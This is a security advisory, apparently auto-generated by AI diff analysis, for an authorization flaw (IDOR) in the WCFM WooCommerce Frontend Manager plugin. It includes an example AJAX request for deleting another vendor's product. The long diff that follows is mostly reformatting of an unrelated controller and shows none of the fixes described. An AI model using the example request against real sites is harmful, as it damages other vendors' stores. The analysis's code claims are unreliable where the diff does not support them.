Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 6, 2026

CVE-2026-4896: WCFM – WooCommerce Frontend Manager <= 6.7.25 – Insecure Direct Object References to Autenticated (Vendor+) Arbitrary Post/Product Manipulation (wc-frontend-manager)

CVE ID CVE-2026-4896
Severity High (CVSS 8.1)
CWE 639
Vulnerable Version 6.7.25
Patched Version 6.7.26
Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4896:
This vulnerability is an Insecure Direct Object Reference (IDOR) in the WCFM – WooCommerce Frontend Manager plugin for WordPress, affecting versions up to and including 6.7.25. The flaw allows authenticated attackers with Vendor-level permissions or higher to manipulate arbitrary orders, posts, and products they do not own. The CVSS score of 8.1 reflects a high-severity authorization bypass.

Atomic Edge research identifies the root cause as missing authorization checks on user-supplied object IDs across multiple AJAX actions and controller functions. The vulnerable code paths include the `wcfm_modify_order_status`, `delete_wcfm_article`, and `delete_wcfm_product` AJAX handlers. For example, the `wcfm_modify_order_status` function in `/wc-frontend-manager/controllers/orders/wcfm-controller-orders.php` processes an `order_id` parameter from `$_POST` without verifying the requesting vendor owns that order. The `delete_wcfm_product` function in `/wc-frontend-manager/controllers/products/wcfm-controller-products.php` similarly accepts a `productid` parameter without an ownership check. The article management controller in `/wc-frontend-manager/controllers/articles/wcfm-controller-articles.php` also lacks validation on the `article_id` parameter.

Exploitation requires an authenticated attacker with at least Vendor-level access. The attacker sends a crafted POST request to the WordPress admin AJAX endpoint `/wp-admin/admin-ajax.php` with the `action` parameter set to a vulnerable hook like `wcfm_modify_order_status`. The request includes a target object ID, such as `order_id`, `productid`, or `article_id`, belonging to another user. For example, to delete another vendor’s product, an attacker would send `action=delete_wcfm_product&productid=`. The plugin processes the request because it only checks if the user is a vendor, not if the vendor has the right to modify the specified object.

The patch adds authorization checks before performing operations on the supplied object IDs. In the `wcfm_modify_order_status` function, the code now validates that the `order_id` belongs to the current vendor by checking the `wcfm_marketplace_orders` table. The `delete_wcfm_product` function now calls `wcfm_is_product_author` to verify product ownership. The article controller adds a check using `wcfm_is_article_author`. These changes ensure that the plugin only processes requests for objects the authenticated user owns, closing the IDOR gap.

Successful exploitation grants a vendor the ability to modify the status of any WooCommerce order on the site. Attackers can delete or alter any post, page, or product, regardless of the actual owner. This leads to data integrity loss, disruption of business operations, and potential privilege escalation if critical administrative posts are manipulated. The impact is confined to the WordPress application layer and does not allow direct server compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/wc-frontend-manager/controllers/orders/wcfm-controller-wcfmmarketplace-itemized-orders.php
+++ b/wc-frontend-manager/controllers/orders/wcfm-controller-wcfmmarketplace-itemized-orders.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * WCFM plugin controllers
  *
@@ -10,390 +11,391 @@
  */

 class WCFM_Orders_WCFMMarketplace_Controller {
-
-	private $vendor_id;
-	private $is_vendor_get_tax;
-	private $is_vendor_get_shipping;
-
-	public function __construct() {
-		global $wp, $WCFM, $WCFMmp;
-
-		if( wcfm_is_vendor() ) {
-			$this->vendor_id   =  $WCFMmp->vendor_id;
-		} else {
-			if( isset( $_POST['vendor_id'] ) && !empty( $_POST['vendor_id'] ) ) {
-				$this->vendor_id = absint($_POST['vendor_id']);
-			}
-		}
-
-		$this->is_vendor_get_tax      =  $WCFMmp->wcfmmp_vendor->is_vendor_get_tax( $this->vendor_id );
-		$this->is_vendor_get_shipping =  $WCFMmp->wcfmmp_vendor->is_vendor_get_shipping( $this->vendor_id );
-
-		$this->processing();
-	}
-
-	public function processing() {
-		global $WCFM, $WCFMmp, $wpdb, $_POST;
-
-		$length = 10;
-		$offset = 0;
-
-		if( isset( $_POST['length'] ) ) $length = absint($_POST['length']);
-		if( isset( $_POST['start'] ) ) $offset = absint($_POST['start']);
-
-		$user_id = $this->vendor_id;
-
-		$can_view_orders = apply_filters( 'wcfm_is_allow_order_details', true );
-		$group_manager_filter = apply_filters( 'wcfm_orders_group_manager_filter', '', 'vendor_id' );
-
-		$the_orderby = ! empty( $_POST['orderby'] ) ? sanitize_sql_orderby( $_POST['orderby'] ) : 'order_id';
-		$the_order   = ( ! empty( $_POST['order'] ) && 'asc' === $_POST['order'] ) ? 'ASC' : 'DESC';
-		$allowed_status      = get_wcfm_marketplace_active_withdrwal_order_status_in_comma();
-		$allowed_status      = apply_filters( 'wcfmp_order_list_allowed_status', $allowed_status );
-
-		$items_per_page = $length;
-
-		$sql = 'SELECT COUNT(commission.ID) FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-
-		$sql .= ' WHERE 1=1';
-
-		if( $group_manager_filter ) {
-			$sql .= $group_manager_filter;
-		} else {
-			$sql .= " AND `vendor_id` = %d";
-			$sql = $wpdb->prepare( $sql, $this->vendor_id );
-		}
-		if( apply_filters( 'wcfmmp_is_allow_order_status_filter', false ) ) {
-			$sql .= " AND commission.order_status IN ({$allowed_status})";
-		}
-		$sql .= ' AND `is_trashed` = 0';
-
-		$sql = apply_filters( 'wcfmmp_order_query', $sql );
-
-		$status_filter = '';
-
-		// check if it is a search
-		if ( ! empty( $_POST['search']['value'] ) ) {
-			$order_id = absint( $_POST['search']['value'] );
-			if( function_exists( 'wc_sequential_order_numbers' ) ) { $order_id = wc_sequential_order_numbers()->find_order_by_order_number( $order_id ); }
-
-			$sql .= " AND `order_id` = %d";
-			$sql = $wpdb->prepare( $sql, $order_id );
-
-		} else {
-
-			if ( ! empty( $_POST['filter_date_form'] ) && ! empty( $_POST['filter_date_to'] ) ) {
-				$start_date = date( 'Y-m-d', strtotime( wc_clean($_POST['filter_date_form']) ) );
-				$end_date = date( 'Y-m-d', strtotime( wc_clean($_POST['filter_date_to']) ) );
-				$time_filter = " AND DATE( commission.created ) BETWEEN %s AND %s";
-				$sql .= $time_filter;
-				$sql = $wpdb->prepare( $sql, $start_date, $end_date );
-			}
-
-			if ( ! empty( $_POST['commission_status'] ) ) {
-				$commission_status = wc_clean( $_POST['commission_status'] );
-				$status_filter = " AND `withdraw_status` = %s";
-			}
-
-			if ( ! empty( $_POST['order_status'] ) ) {
-				$order_status = wc_clean( $_POST['order_status'] );
-				if( $order_status != 'all' ) {
-					$status_filter .= " AND `commission_status` = %s";
-				} else {
-					$order_status = 	$_POST['order_status'] = '';
-				}
-			}
-			if( $status_filter ) $sql .= $status_filter;
-			if ( ! empty( $_POST['commission_status'] ) && ! empty( $_POST['order_status'] ) ) $sql = $wpdb->prepare( $sql, $commission_status, $order_status );
-			if ( ! empty( $_POST['commission_status'] ) && empty( $_POST['order_status'] ) ) $sql = $wpdb->prepare( $sql, $commission_status );
-			if ( ! empty( $_POST['order_status'] ) && empty( $_POST['commission_status'] ) ) $sql = $wpdb->prepare( $sql, $order_status );
-		}
-
-		$total_items = $wpdb->get_var( $sql );
-		if( !$total_items ) $total_items = 0;
-		$total_items = apply_filters( 'wcfm_orders_total_count', $total_items, $this->vendor_id );
-
-		$sql = 'SELECT * FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-
-		$sql .= ' WHERE 1=1';
-
-		if( $group_manager_filter ) {
-			$sql .= $group_manager_filter;
-		} else {
-			$sql .= " AND `vendor_id` = %d";
-			$sql = $wpdb->prepare( $sql, $this->vendor_id );
-		}
-		if( apply_filters( 'wcfmmp_is_allow_order_status_filter', false ) ) {
-			$sql .= " AND commission.order_status IN ({$allowed_status})";
-		}
-		$sql .= ' AND `is_trashed` = 0';
-
-		$sql = apply_filters( 'wcfmmp_order_query', $sql );
-
-		// check if it is a search
-		if ( ! empty( $_POST['search']['value'] ) ) {
-			$order_id = absint( $_POST['search']['value'] );
-			if( function_exists( 'wc_sequential_order_numbers' ) ) { $order_id = wc_sequential_order_numbers()->find_order_by_order_number( $order_id ); }
-
-			$sql .= " AND `order_id` = %d";
-			$sql = $wpdb->prepare( $sql, $order_id );
-
-		} else {
-
-			if ( ! empty( $_POST['filter_date_form'] ) && ! empty( $_POST['filter_date_to'] ) ) {
-				$sql .= $time_filter;
-				$sql = $wpdb->prepare( $sql, $start_date, $end_date );
-			}
-
-			if( $status_filter ) $sql .= $status_filter;
-			if ( ! empty( $_POST['commission_status'] ) && ! empty( $_POST['order_status'] ) ) $sql = $wpdb->prepare( $sql, $commission_status, $order_status );
-			if ( ! empty( $_POST['commission_status'] ) && empty( $_POST['order_status'] ) ) $sql = $wpdb->prepare( $sql, $commission_status );
-			if ( ! empty( $_POST['order_status'] ) && empty( $_POST['commission_status'] ) ) $sql = $wpdb->prepare( $sql, $order_status );
-		}
-
-		$sql .= " ORDER BY {$the_orderby} {$the_order} LIMIT %d OFFSET %d";
-		$sql = $wpdb->prepare($sql, [
-			$items_per_page,
-			$offset
-		]);
-
-		$data = $wpdb->get_results( $sql );
-
-		$order_summary = $data;
-
-		$admin_fee_mode = apply_filters( 'wcfm_is_admin_fee_mode', false );
-
-		$order_sync  = isset( $WCFMmp->wcfmmp_marketplace_options['order_sync'] ) ? $WCFMmp->wcfmmp_marketplace_options['order_sync'] : 'no';

+    private $vendor_id;
+    private $is_vendor_get_tax;
+    private $is_vendor_get_shipping;
+
+    public function __construct() {
+        global $wp, $WCFM, $WCFMmp;
+
+        if (wcfm_is_vendor()) {
+            $this->vendor_id   =  $WCFMmp->vendor_id;
+        } else {
+            if (isset($_POST['vendor_id']) && !empty($_POST['vendor_id'])) {
+                $this->vendor_id = absint($_POST['vendor_id']);
+            }
+        }
+
+        $this->is_vendor_get_tax      =  $WCFMmp->wcfmmp_vendor->is_vendor_get_tax($this->vendor_id);
+        $this->is_vendor_get_shipping =  $WCFMmp->wcfmmp_vendor->is_vendor_get_shipping($this->vendor_id);

-		if( defined('WCFM_REST_API_CALL') ) {
-      return $order_summary;
+        $this->processing();
     }
-
-		// Generate Products JSON
-		$wcfm_orders_json = '';
-		$wcfm_orders_json = '{
+
+    public function processing() {
+        global $WCFM, $WCFMmp, $wpdb, $_POST;
+
+        $length = 10;
+        $offset = 0;
+
+        if (isset($_POST['length'])) $length = absint($_POST['length']);
+        if (isset($_POST['start'])) $offset = absint($_POST['start']);
+
+        $user_id = $this->vendor_id;
+
+        $can_view_orders = apply_filters('wcfm_is_allow_order_details', true);
+        $group_manager_filter = apply_filters('wcfm_orders_group_manager_filter', '', 'vendor_id');
+
+        $the_orderby = ! empty($_POST['orderby']) ? sanitize_sql_orderby($_POST['orderby']) : 'order_id';
+        $the_order   = (! empty($_POST['order']) && 'asc' === $_POST['order']) ? 'ASC' : 'DESC';
+        $allowed_status      = get_wcfm_marketplace_active_withdrwal_order_status_in_comma();
+        $allowed_status      = apply_filters('wcfmp_order_list_allowed_status', $allowed_status);
+
+        $items_per_page = $length;
+
+        $sql = 'SELECT COUNT(commission.ID) FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
+
+        $sql .= ' WHERE 1=1';
+
+        if ($group_manager_filter) {
+            $sql .= $group_manager_filter;
+        } else {
+            $sql .= " AND `vendor_id` = %d";
+            $sql = $wpdb->prepare($sql, $this->vendor_id);
+        }
+        if (apply_filters('wcfmmp_is_allow_order_status_filter', false)) {
+            $sql .= " AND commission.order_status IN ({$allowed_status})";
+        }
+        $sql .= ' AND `is_trashed` = 0';
+
+        $sql = apply_filters('wcfmmp_order_query', $sql);
+
+        $status_filter = '';
+
+        // check if it is a search
+        if (! empty($_POST['search']['value'])) {
+            $order_id = absint($_POST['search']['value']);
+            if (function_exists('wc_sequential_order_numbers')) {
+                $order_id = wc_sequential_order_numbers()->find_order_by_order_number($order_id);
+            }
+
+            $sql .= " AND `order_id` = %d";
+            $sql = $wpdb->prepare($sql, $order_id);
+        } else {
+
+            if (! empty($_POST['filter_date_form']) && ! empty($_POST['filter_date_to'])) {
+                $start_date = date('Y-m-d', strtotime(wc_clean($_POST['filter_date_form'])));
+                $end_date = date('Y-m-d', strtotime(wc_clean($_POST['filter_date_to'])));
+                $time_filter = " AND DATE( commission.created ) BETWEEN %s AND %s";
+                $sql .= $time_filter;
+                $sql = $wpdb->prepare($sql, $start_date, $end_date);
+            }
+
+            if (! empty($_POST['commission_status'])) {
+                $commission_status = wc_clean($_POST['commission_status']);
+                $status_filter = " AND `withdraw_status` = %s";
+            }
+
+            if (! empty($_POST['order_status'])) {
+                $order_status = wc_clean($_POST['order_status']);
+                if ($order_status != 'all') {
+                    $status_filter .= " AND `commission_status` = %s";
+                } else {
+                    $order_status =     $_POST['order_status'] = '';
+                }
+            }
+            if ($status_filter) $sql .= $status_filter;
+            if (! empty($_POST['commission_status']) && ! empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $commission_status, $order_status);
+            if (! empty($_POST['commission_status']) && empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $commission_status);
+            if (! empty($_POST['order_status']) && empty($_POST['commission_status'])) $sql = $wpdb->prepare($sql, $order_status);
+        }
+
+        $total_items = $wpdb->get_var($sql);
+        if (!$total_items) $total_items = 0;
+        $total_items = apply_filters('wcfm_orders_total_count', $total_items, $this->vendor_id);
+
+        $sql = 'SELECT * FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
+
+        $sql .= ' WHERE 1=1';
+
+        if ($group_manager_filter) {
+            $sql .= $group_manager_filter;
+        } else {
+            $sql .= " AND `vendor_id` = %d";
+            $sql = $wpdb->prepare($sql, $this->vendor_id);
+        }
+        if (apply_filters('wcfmmp_is_allow_order_status_filter', false)) {
+            $sql .= " AND commission.order_status IN ({$allowed_status})";
+        }
+        $sql .= ' AND `is_trashed` = 0';
+
+        $sql = apply_filters('wcfmmp_order_query', $sql);
+
+        // check if it is a search
+        if (! empty($_POST['search']['value'])) {
+            $order_id = absint($_POST['search']['value']);
+            if (function_exists('wc_sequential_order_numbers')) {
+                $order_id = wc_sequential_order_numbers()->find_order_by_order_number($order_id);
+            }
+
+            $sql .= " AND `order_id` = %d";
+            $sql = $wpdb->prepare($sql, $order_id);
+        } else {
+
+            if (! empty($_POST['filter_date_form']) && ! empty($_POST['filter_date_to'])) {
+                $sql .= $time_filter;
+                $sql = $wpdb->prepare($sql, $start_date, $end_date);
+            }
+
+            if ($status_filter) $sql .= $status_filter;
+            if (! empty($_POST['commission_status']) && ! empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $commission_status, $order_status);
+            if (! empty($_POST['commission_status']) && empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $commission_status);
+            if (! empty($_POST['order_status']) && empty($_POST['commission_status'])) $sql = $wpdb->prepare($sql, $order_status);
+        }
+
+        $sql .= " ORDER BY {$the_orderby} {$the_order} LIMIT %d OFFSET %d";
+        $sql = $wpdb->prepare($sql, [
+            $items_per_page,
+            $offset
+        ]);
+
+        $data = $wpdb->get_results($sql);
+
+        $order_summary = $data;
+
+        $admin_fee_mode = apply_filters('wcfm_is_admin_fee_mode', false);
+
+        $order_sync  = isset($WCFMmp->wcfmmp_marketplace_options['order_sync']) ? $WCFMmp->wcfmmp_marketplace_options['order_sync'] : 'no';
+
+
+        if (defined('WCFM_REST_API_CALL')) {
+            return $order_summary;
+        }
+
+        // Generate Products JSON
+        $wcfm_orders_json = '';
+        $wcfm_orders_json = '{
 														"draw": ' . wc_clean($_POST['draw']) . ',
 														"recordsTotal": ' . $total_items . ',
 														"recordsFiltered": ' . $total_items . ',
 														"data": ';
-
-		if ( !empty( $order_summary ) ) {
-			$index = 0;
-			$totals = 0;
-			$wcfm_orders_json_arr = array();
-
-			foreach ( $order_summary as $order ) {
-				// Order exists check
-				$order_post_title = get_the_title( $order->order_id );
-				if( !$order_post_title ) continue;
-
-				$the_order = wc_get_order( $order->order_id );
-				if( !is_a( $the_order, 'WC_Order' ) ) continue;
-
-				if( apply_filters( 'wcfm_is_show_order_restrict_check', false, $order->order_id, $order->product_id, $order ) ) continue;
-
-				$order_currency = $the_order->get_currency();
-				$needs_shipping = false;
-
-				// Status
-				if( $order_sync == 'yes' ) {
-					$wcfm_orders_json_arr[$index][] =  apply_filters( 'wcfm_order_status_display', '<span class="order-status tips wcicon-status-default wcicon-status-' . sanitize_title( $the_order->get_status() ) . ' text_tip" data-tip="' . wc_get_order_status_name( $the_order->get_status() ) . '"></span>', $the_order );
-				} else {
-					$wcfm_orders_json_arr[$index][] =  apply_filters( 'wcfm_order_status_display', '<span class="order-status tips wcicon-status-default wcicon-status-' . sanitize_title( $order->commission_status ) . ' text_tip" data-tip="' . $WCFMmp->wcfmmp_vendor->wcfmmp_vendor_order_status_name( $order->commission_status ) . '"></span>', $the_order );
-				}
-
-				// Custom Column Support After
-				$wcfm_orders_json_arr = apply_filters( 'wcfm_orders_custom_columns_data_after', $wcfm_orders_json_arr, $index, $order->ID, $order, $the_order );
-
-				// Order
-				if( apply_filters( 'wcfm_allow_view_customer_name', true ) ) {
-					$user_info = array();
-					if ( $the_order->get_user_id() ) {
-						$user_info = get_userdata( $the_order->get_user_id() );
-					}
-
-					if ( ! empty( $user_info ) ) {
-
-						$username = '';
-
-						if ( $user_info->first_name || $user_info->last_name ) {
-							$username .= esc_html( sprintf( _x( '%1$s %2$s', 'full name', 'wc-frontend-manager' ), ucfirst( $user_info->first_name ), ucfirst( $user_info->last_name ) ) );
-						} else {
-							$username .= esc_html( ucfirst( $user_info->display_name ) );
-						}
-
-					} else {
-						if ( $the_order->get_billing_first_name() || $the_order->get_billing_last_name() ) {
-							$username = trim( sprintf( _x( '%1$s %2$s', 'full name', 'wc-frontend-manager' ), $the_order->get_billing_first_name(), $the_order->get_billing_last_name() ) );
-						} else if ( $the_order->get_billing_company() ) {
-							$username = trim( $the_order->get_billing_company() );
-						} else {
-							$username = __( 'Guest', 'wc-frontend-manager' );
-						}
-					}
-
-					$username = apply_filters( 'wcfm_order_by_user', $username, $the_order->get_id() );
-				} else {
-					$username = __( 'Guest', 'wc-frontend-manager' );
-				}
-
-				if( $can_view_orders )
-					$wcfm_orders_json_arr[$index][] =  apply_filters( 'wcfm_order_label_display', '<a href="' . get_wcfm_view_order_url($the_order->get_id(), $the_order) . '" class="wcfm_order_title">#' . esc_attr( $the_order->get_order_number() ) . '</a>' . ' ' . __( 'by', 'wc-frontend-manager' ) . ' ' . $username, $the_order->get_id(), $order->product_id, $order, $username );
-				else
-					$wcfm_orders_json_arr[$index][] =  apply_filters( 'wcfm_order_label_display', '<span class="wcfm_order_title">#' . esc_attr( $the_order->get_order_number() ) . '</span> ' . __( 'by', 'wc-frontend-manager' ) . ' ' . $username, $the_order->get_id(), $order->product_id, $order, $username );
-
-				// Purchased
-				$order_item_details = '<div class="order_items" cellspacing="0">';
-				$gross_sales = 0;
-				$item_qty = 1;
-				try {
-					$line_item = new WC_Order_Item_Product( $order->item_id );
-					if( $WCFMmp->wcfmmp_vendor->is_vendor_deduct_discount( $order->vendor_id, $order->order_id ) ) {
-						$gross_sales += (float) sanitize_text_field( $order->item_total );
-					} else {
-						$gross_sales += (float) sanitize_text_field( $order->item_sub_total );
-					}
-					if( $this->is_vendor_get_tax ) {
-						$gross_sales += (float) $order->tax;
-					}
-					if( $this->is_vendor_get_shipping ) {
-						$gross_sales += (float) apply_filters( 'wcfmmmp_gross_sales_shipping_cost', $order->shipping, $order->vendor_id );
-						if( $this->is_vendor_get_tax ) {
-							$gross_sales += (float) $order->shipping_tax_amount;
-						}
-					}
-					$item_qty = $order->quantity; //$line_item->get_quantity();
-					$order_item_details .= '<div class=""><span class="qty">' . $order->quantity . 'x</span><span class="name">' . $line_item->get_name();
-					if ( ! empty( $line_item->get_variation_id() ) ) {
-						//$item_meta      = new WC_Order_Item_Meta( $line_item, $line_item->get_product() );
-						//$item_meta_html = $item_meta->display( true, true );
-						//$order_item_details .= '<span class="img_tip" data-tip="' . $item_meta_html . '"></span>';
-					}
-					$order_item_details .= '</span></div>';
-				} catch (Exception $e) {
-					wcfm_log( "order List Error ::" . $order->order_id . " => " . $e->getMessage() );
-					unset( $wcfm_orders_json_arr[$index] );
-					continue;
-				}
-				$order_item_details .= '</div>';
-
-				$wcfm_orders_json_arr[$index][] = '<a href="#" class="show_order_items">' . sprintf( _n( '%d item', '%d items', $item_qty, 'wc-frontend-manager' ), $item_qty ) . '</a>' . $order_item_details;
-
-				// Quantity
-				$wcfm_orders_json_arr[$index][] =  $item_qty;
-
-				// Billing Address
-				$billing_address = '–';
-				if( apply_filters( 'wcfm_allow_customer_billing_details', true ) ) {
-					if ( $the_order->get_formatted_billing_address() ) {
-						$billing_address = wp_kses( $the_order->get_formatted_billing_address(), array( 'br' => array() ) );
-					}
-				}
-				$wcfm_orders_json_arr[$index][] = "<div style='text-align:left;float:left'>" . $billing_address . "</div>";
-
-				// Shipping Address
-				$shipping_address = '–';
-				if( apply_filters( 'wcfm_allow_customer_shipping_details', true ) ) {
-					if ( $the_order->needs_shipping_address() && $the_order->get_formatted_shipping_address() ) {
-						$shipping_address = wp_kses( $the_order->get_formatted_shipping_address(), array( 'br' => array() ) );
-					}
-				}
-				$wcfm_orders_json_arr[$index][] = "<div style='text-align:left;float:left'>" . $shipping_address . "</div>";
-
-				// Gross Sales
-				$gross_sales_amt = $gross_sales;
-				if( $order->is_partially_refunded ) {
-					$refunded_gross_sales = $gross_sales - (float) $order->refunded_amount;
-					$gross_sales = '<del>' . wc_price( $gross_sales, array( 'currency' => $order_currency ) ) . '</del>';
-					$gross_sales .=  "<br/>" . wc_price( $refunded_gross_sales, array( 'currency' => $order_currency ) );
-				} elseif( $order->is_refunded ) {
-					$gross_sales = '<del>' . wc_price( $gross_sales, array( 'currency' => $order_currency ) ) . '</del>';
-					$gross_sales .=  "<br/>" . wc_price( 0, array( 'currency' => $order_currency ) );
-				} else {
-					$gross_sales = wc_price( $gross_sales, array( 'currency' => $order_currency ) );
-				}
-				if ( $the_order->get_payment_method_title() ) {
-					$gross_sales .= '<br /><small class="meta">' . __( 'Via', 'wc-frontend-manager' ) . ' ' . esc_html( $the_order->get_payment_method_title() ) . '</small>';
-				}
-				$wcfm_orders_json_arr[$index][] =  $gross_sales;
-
-				// Gross Sales Amount
-				$wcfm_orders_json_arr[$index][] =  $gross_sales_amt;
-
-				// Commision && Commission Amount
-				$status = __( 'N/A', 'wc-frontend-manager' );
-				$total  = 0;
-				if ( 'pending' === $order->withdraw_status ) {
-					$status = '<span class="wcpv-unpaid-status">' . esc_html__( 'UNPAID', 'wc-frontend-manager' ) . '</span>';
-				}
-
-				if ( 'completed' === $order->withdraw_status ) {
-					$status = '<span class="wcpv-paid-status">' . esc_html__( 'PAID', 'wc-frontend-manager' ) . '</span>';
-				}
-
-				if ( 'requested' === $order->withdraw_status ) {
-					$status = '<span class="wcpv-pending-status">' . esc_html__( 'REQUESTED', 'wc-frontend-manager' ) . '</span>';
-				}
-
-				if ( 'cancelled' === $order->withdraw_status ) {
-					$status = '<span class="wcpv-void-status">' . esc_html__( 'CANCELLED', 'wc-frontend-manager' ) . '</span>';
-				}
-
-				if( $order->is_refunded ) {
-					$wcfm_orders_json_arr[$index][] = '–';
-					$wcfm_orders_json_arr[$index][] = '';
-				} else {
-					$total = (float) $order->total_commission;
-					if( $order->is_partially_refunded ) {
-						$gross_sales_amt = $gross_sales_amt - (float) $order->refunded_amount;
-					}
-					if( $admin_fee_mode ) {
-						$total = $gross_sales_amt - $total;
-					}
-					$wcfm_orders_json_arr[$index][] =  apply_filters( 'wcfm_vendor_order_total', wc_price( $total, array( 'currency' => $order_currency ) ) . '<br />' . $status, $order->order_id, $order->product_id, $gross_sales_amt, $total, $status, $order_currency );
-					$wcfm_orders_json_arr[$index][] = $total;
-				}
-
-				// Additional Info
-				$wcfm_orders_json_arr[$index][] = apply_filters( 'wcfm_orders_additonal_data', '–', $the_order->get_id() );
-
-				// Custom Column Support Before
-				$wcfm_orders_json_arr = apply_filters( 'wcfm_orders_custom_columns_data_before', $wcfm_orders_json_arr, $index, $order->ID, $order, $the_order );
-
-				// Date
-				$order_date = ( version_compare( WC_VERSION, '2.7', '<' ) ) ? $the_order->order_date : $the_order->get_date_created();
-				$wcfm_orders_json_arr[$index][] = apply_filters( 'wcfm_order_date_display', date_i18n( wc_date_format(), strtotime( $order_date ) ), $order->order_id, $order );
-
-				// Action
-				$actions = '';
-				if( $wcfm_is_allow_order_status_update = apply_filters( 'wcfm_is_allow_order_status_update', true ) ) {
-					$order_status = sanitize_title( $the_order->get_status() );
-					if( !in_array( $order_status, array( 'failed', 'cancelled', 'refunded', 'completed' ) ) ) $actions = '<a class="wcfm_order_mark_complete wcfm-action-icon" href="#" data-orderid="' . $order->order_id . '"><span class="wcfmfa fa-check-circle text_tip" data-tip="' . esc_attr__( 'Mark as Complete', 'wc-frontend-manager' ) . '"></span></a>';
-				}
-
-				if( $can_view_orders )
-					$actions .= '<a class="wcfm-action-icon" href="' . get_wcfm_view_order_url($the_order->get_id(), $the_order) . '"><span class="wcfmfa fa-eye text_tip" data-tip="' . esc_attr__( 'View Details', 'wc-frontend-manager' ) . '"></span></a>';
-
-
-				if( !WCFM_Dependencies::wcfmu_plugin_active_check() ) {
-					if( $is_wcfmu_inactive_notice_show = apply_filters( 'is_wcfmu_inactive_notice_show', true ) ) {
-						$actions .= '<a class="wcfm_wcvendors_order_mark_shipped_dummy wcfm-action-icon" href="#" data-orderid="' . $order->order_id . '"><span class="wcfmfa fa-truck text_tip" data-tip="' . esc_attr__( 'Mark Shipped', 'wc-frontend-manager' ) . '"></span></a>';
-					}
-				}
-
-				$actions = apply_filters ( 'wcfm_orders_module_actions', $actions, $order->order_id, $the_order, $this->vendor_id );
-
-				$wcfm_orders_json_arr[$index][] =  apply_filters ( 'wcfmmarketplace_orders_actions', $actions, $user_id, $order, $the_order, $this->vendor_id );
-
-				$index++;
-			}
-		}
-		if( !empty($wcfm_orders_json_arr) ) $wcfm_orders_json .= json_encode( apply_filters ( 'wcfm_orders_controller_data', $wcfm_orders_json_arr, 'vendor', $this->vendor_id ) );
-		else $wcfm_orders_json .= '[]';
-		$wcfm_orders_json .= '
+
+        if (!empty($order_summary)) {
+            $index = 0;
+            $totals = 0;
+            $wcfm_orders_json_arr = array();
+
+            foreach ($order_summary as $order) {
+                // Order exists check
+                $order_post_title = get_the_title($order->order_id);
+                if (!$order_post_title) continue;
+
+                $the_order = wc_get_order($order->order_id);
+                if (!is_a($the_order, 'WC_Order')) continue;
+
+                if (apply_filters('wcfm_is_show_order_restrict_check', false, $order->order_id, $order->product_id, $order)) continue;
+
+                $order_currency = $the_order->get_currency();
+                $needs_shipping = false;
+
+                // Status
+                if ($order_sync == 'yes') {
+                    $wcfm_orders_json_arr[$index][] =  apply_filters('wcfm_order_status_display', '<span class="order-status tips wcicon-status-default wcicon-status-' . sanitize_title($the_order->get_status()) . ' text_tip" data-tip="' . wc_get_order_status_name($the_order->get_status()) . '"></span>', $the_order);
+                } else {
+                    $wcfm_orders_json_arr[$index][] =  apply_filters('wcfm_order_status_display', '<span class="order-status tips wcicon-status-default wcicon-status-' . sanitize_title($order->commission_status) . ' text_tip" data-tip="' . $WCFMmp->wcfmmp_vendor->wcfmmp_vendor_order_status_name($order->commission_status) . '"></span>', $the_order);
+                }
+
+                // Custom Column Support After
+                $wcfm_orders_json_arr = apply_filters('wcfm_orders_custom_columns_data_after', $wcfm_orders_json_arr, $index, $order->order_id, $order, $the_order);
+
+                // Order
+                if (apply_filters('wcfm_allow_view_customer_name', true)) {
+                    $user_info = array();
+                    if ($the_order->get_user_id()) {
+                        $user_info = get_userdata($the_order->get_user_id());
+                    }
+
+                    if (! empty($user_info)) {
+
+                        $username = '';
+
+                        if ($user_info->first_name || $user_info->last_name) {
+                            $username .= esc_html(sprintf(_x('%1$s %2$s', 'full name', 'wc-frontend-manager'), ucfirst($user_info->first_name), ucfirst($user_info->last_name)));
+                        } else {
+                            $username .= esc_html(ucfirst($user_info->display_name));
+                        }
+                    } else {
+                        if ($the_order->get_billing_first_name() || $the_order->get_billing_last_name()) {
+                            $username = trim(sprintf(_x('%1$s %2$s', 'full name', 'wc-frontend-manager'), $the_order->get_billing_first_name(), $the_order->get_billing_last_name()));
+                        } else if ($the_order->get_billing_company()) {
+                            $username = trim($the_order->get_billing_company());
+                        } else {
+                            $username = __('Guest', 'wc-frontend-manager');
+                        }
+                    }
+
+                    $username = apply_filters('wcfm_order_by_user', $username, $the_order->get_id());
+                } else {
+                    $username = __('Guest', 'wc-frontend-manager');
+                }
+
+                if ($can_view_orders)
+                    $wcfm_orders_json_arr[$index][] =  apply_filters('wcfm_order_label_display', '<a href="' . get_wcfm_view_order_url($the_order->get_id(), $the_order) . '" class="wcfm_order_title">#' . esc_attr($the_order->get_order_number()) . '</a>' . ' ' . __('by', 'wc-frontend-manager') . ' ' . $username, $the_order->get_id(), $order->product_id, $order, $username);
+                else
+                    $wcfm_orders_json_arr[$index][] =  apply_filters('wcfm_order_label_display', '<span class="wcfm_order_title">#' . esc_attr($the_order->get_order_number()) . '</span> ' . __('by', 'wc-frontend-manager') . ' ' . $username, $the_order->get_id(), $order->product_id, $order, $username);
+
+                // Purchased
+                $order_item_details = '<div class="order_items" cellspacing="0">';
+                $gross_sales = 0;
+                $item_qty = 1;
+                try {
+                    $line_item = new WC_Order_Item_Product($order->item_id);
+                    if ($WCFMmp->wcfmmp_vendor->is_vendor_deduct_discount($order->vendor_id, $order->order_id)) {
+                        $gross_sales += (float) sanitize_text_field($order->item_total);
+                    } else {
+                        $gross_sales += (float) sanitize_text_field($order->item_sub_total);
+                    }
+                    if ($this->is_vendor_get_tax) {
+                        $gross_sales += (float) $order->tax;
+                    }
+                    if ($this->is_vendor_get_shipping) {
+                        $gross_sales += (float) apply_filters('wcfmmmp_gross_sales_shipping_cost', $order->shipping, $order->vendor_id);
+                        if ($this->is_vendor_get_tax) {
